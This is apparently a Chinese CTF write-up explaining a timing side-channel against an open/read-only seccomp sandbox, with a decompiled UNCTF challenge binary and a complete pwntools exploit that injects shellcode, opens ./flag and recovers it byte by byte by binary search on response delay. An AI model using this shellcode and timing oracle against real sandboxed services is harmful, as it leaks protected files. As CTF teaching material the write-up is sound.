做SCTF时碰到一个没看过的题型,比赛结束之后才知道是orw的一个玩法,测信道攻击。主要特点就是只给使用open,read,但是不给write,即无法把flag输出到终端。这里可以通过把flag读到栈上,再逐个爆破比较,来确定flag。原理和web的时间盲注类似。

下面给出一个UNCTF的测信道攻击的例题:

 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3)

 2 {

 3   unsigned int v3; // eax

 4   __int64 v5; // [rsp+50h] [rbp-40h]

 5   __int64 v6; // [rsp+58h] [rbp-38h]

 6   __int128 buf; // [rsp+60h] [rbp-30h] BYREF

 7   __int64 v8; // [rsp+70h] [rbp-20h]

 8   unsigned __int64 v9; // [rsp+80h] [rbp-10h]

 9

10   v9 = __readfsqword(0x28u);

11   sub_AE0(a1, a2, a3);

12   buf = 0LL;

13   v8 = 0LL;

14   puts("Are you a shellcode master?");

15   alarm(0x14u);

16   v3 = getpagesize();

17   v6 = (int)mmap((void *)0x1000, v3, 7, 34, 0, 0LL);

18   read(0, &buf, 0x18uLL);

19   prctl(38, 1LL, 0LL, 0LL, 0LL);

20   v5 = seccomp_init(0LL);

21   seccomp_rule_add(v5, 2147418112LL, 15LL, 0LL);

22   seccomp_rule_add(v5, 2147418112LL, 2LL, 0LL);

23   seccomp_rule_add(v5, 2147418112LL, 0LL, 0LL);

24   seccomp_rule_add(v5, 2147418112LL, 10LL, 0LL);

25   seccomp_load(v5);

26   *(_QWORD *)(v6 + 16) = v8;

27   *(_OWORD *)v6 = buf;

28   ((void (__fastcall *)(__int64, __int64))v6)(3735928559LL, 4919LL);

29   return 0LL;

30 }

主函数的开头mmap了一块大空间,然后读入数据到buf,接着会把分配的那块内存的开头赋为我们刚刚读入的内容,并且执行。

读入的0x18并不足够写入整个orw_shellcode,所以我们先写入一个shellcode来读取内容,再进行爆破。

下面是exp:

 1 import time

 2 from pwn import *

 3

 4 context.arch='amd64'

 5

 6 def getshellcode():

 7     global s

 8     shellcode = '''

 9         mov rdi, 0

10         mov rsi, 0x10018

11         mov rdx, 0x250

12         syscall

13         nop

14         '''

15     s.recvline()

16     s.send(asm(shellcode))

17     sleep(0.1)

18

19 def pwn():

20     global s

21     flag = ''

22     count = 1

23     for i in range (len(flag),0x50):

24         left = 32

25         right = 127

26         while left < right:

27             s = process('./ezshell')

28             #s = remote('node2.hackingfor.fun',38235)

29             getshellcode()

30             mid = (left + right) >> 1

31             orw_shellcode = f'''

32                 mov rdi, 0x67616c662f2e

33                 push rdi

34                 mov rdi, rsp

35                 mov rsi, 0

36                 mov rdx, 0

37                 mov rax, 2

38                 syscall

39                 mov rdi, 3

40                 mov rsi, rsp

41                 mov rdx, 0x100

42                 mov rax, 0

43                 syscall

44                 mov dl, byte ptr [rsp+{i}]

45                 mov cl, {mid}

46                 cmp dl, cl

47                 ja loop

48                 ret

49                 loop:

50                 jmp loop

51             '''

52             s.sendline(asm(orw_shellcode))

53             start_time = time.time()

54             try:

55                 s.recv(timeout=0.2)

56                 if(time.time() - start_time > 0.1):

57                     left = mid + 1

58             except:

59                 right = mid

60             s.close()

61             log.info('time-->'+str(count))

62             log.info(flag)

63             count +=1

64         flag += chr(left)

65         log.info(flag)

66         if(flag[-1] == '}'):

67             break

68 pwn()

69 s.interactive()

题目附件
提取码:2efj

ORW-测信道攻击的更多相关文章

  1. 嵌入式 -- WINKHUB 边信道攻击 (NAND Glitch)

    0x00 前言 随着物联网IOT的飞速发展,各类嵌入式设备, 路由器安全研究也越来越火. 但因为跟以往纯软件安全研究的要求不同, 这类研究往往需要结合相应的硬件知识. 很多朋友困惑如何开始, 甚至卡在 ...

  2. intel:spectre&Meltdown侧信道攻击(三)—— raw hammer

    今天介绍raw hammer攻击的原理:这次有点“标题党”了.事实上,raw hammer是基于DRAM内存的攻击:所以理论上,只要是用了DRAM内存的设备,不论是什么cpu(intel.amd,或则 ...

  3. intel:spectre&Meltdown侧信道攻击(一)

    只要平时对安全领域感兴趣的读者肯定都听过spectre&Meltdown侧信道攻击,今天简单介绍一下这种攻击的原理( https://www.bilibili.com/video/av1814 ...

  4. 第四十三个知识点:为AES描述一些基础的(可能无效)的对抗侧信道攻击的防御

    第四十三个知识点:为AES描述一些基础的(可能无效)的对抗侧信道攻击的防御 原文地址:http://bristolcrypto.blogspot.com/2015/07/52-things-numbe ...

  5. 第四十五个知识点:描述一些对抗RSA侧信道攻击的基础防御方法

    第四十五个知识点:描述一些对抗RSA侧信道攻击的基础防御方法 原文地址:http://bristolcrypto.blogspot.com/2015/08/52-things-number-45-de ...

  6. 侧信道攻击,从喊666到入门之——Unicorn的环境构建

    作者:backahasten 发表于小米安全中心微信公众号 0x00 前言 Unicorn可以模拟多种指令集的代码,在很多安全研究领域有很强大的作用,但是由于需要从头自己布置栈空间,代码段等虚拟执行环 ...

  7. intel:spectre&Meltdown侧信道攻击(四)—— cache mapping

    前面简单介绍了row hammer攻击的原理和方法,为了更好理解这种底层硬件类攻击,今天介绍一下cpu的cache mapping: 众所周知,cpu从内存读数据,最开始用的是虚拟地址,需要通过分页机 ...

  8. intel:spectre&Meltdown侧信道攻击(二)

    上面一篇介绍了spectre&meltdown基本原理和简单的demo方案,今天继续学习一下该漏洞发现团队原始的POC:https://spectreattack.com/spectre.pd ...

  9. intel:spectre&Meltdown侧信道攻击(五)—— DRAM address mapping

    前面介绍了row hammer,理论上很完美,实际操作的时候会面临很尴尬的问题:内存存储数据最小的单位是cell(就是个电容,充电是1,放电是0),无数个横着的cell组成row,无数个竖着的cell ...

随机推荐

  1. 寻找pair

    给定n个整数使其两两组合成一对pair,例如给定 1 ,2 可以组成的pair为(1,1),(1,2),(2,1),(2,2),然后在这些pair中寻找第k小的pair. 输入第一行包含两个数字,第一 ...

  2. 双向循环链表模板类(C++)

    双向链表又称为双链表,使用双向链表的目的是为了解决在链表中访问直接前驱和后继的问题.其设置前驱后继指针的目的,就是为了节省其时间开销,也就是用空间换时间. 在双向链表的每个节点中应有两个链接指针作为它 ...

  3. mystar01 nodejs MVC 公共CSS,JS设置

    mystar01 nodejs MVC gulp 项目搭建 config/express.js中定义别名 //将下载的第三方库添加到静态资源路径当中,方便访问 app.use('/jquery', e ...

  4. linux下怎么查看某个命令属于哪个包

    # yum whatprovides */ip  或者 # yum provides */ip 即可

  5. Android Menu的基本用法

    使用xml定义Menu 菜单资源文件必须放在res/menu目录中.菜单资源文件必须使用<menu>标签作为根节点.除了<menu>标签外,还有另外两个标签用于设置菜单项和分组 ...

  6. redis入门到精通系列(二):redis操作的两个实践案例

    在前面一篇博客中我们已经学完了redis的五种数据类型操作,回顾一下,五种操作类型分别为:字符串类型(string).列表类型(list).散列类型(hash).集合类型(set).有序集合类型(so ...

  7. Linux服务器---drupal

    Drupal Drupal为用户提供各种工具来管理网站,它可以帮助用户入门,建立自己的网站 1.下载drupal软件(https://www.drupal.org/project/drupal/rel ...

  8. SpringBoot中使用JUnit4(入门篇)

    添加依赖 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>sp ...

  9. Java 设计模式--策略模式,枚举+工厂方法实现

    如果项目中的一个页面跳转功能存在10个以上的if else判断,想要做一下整改 一.什么是策略模式 策略模式是对算法的包装,是把使用算法的责任和算法本身分割开来,委派给不同的对象管理,最终可以实现解决 ...

  10. springMVC中响应的返回值获取方式

    package com.hope.controller;import com.hope.domain.User;import org.springframework.stereotype.Contro ...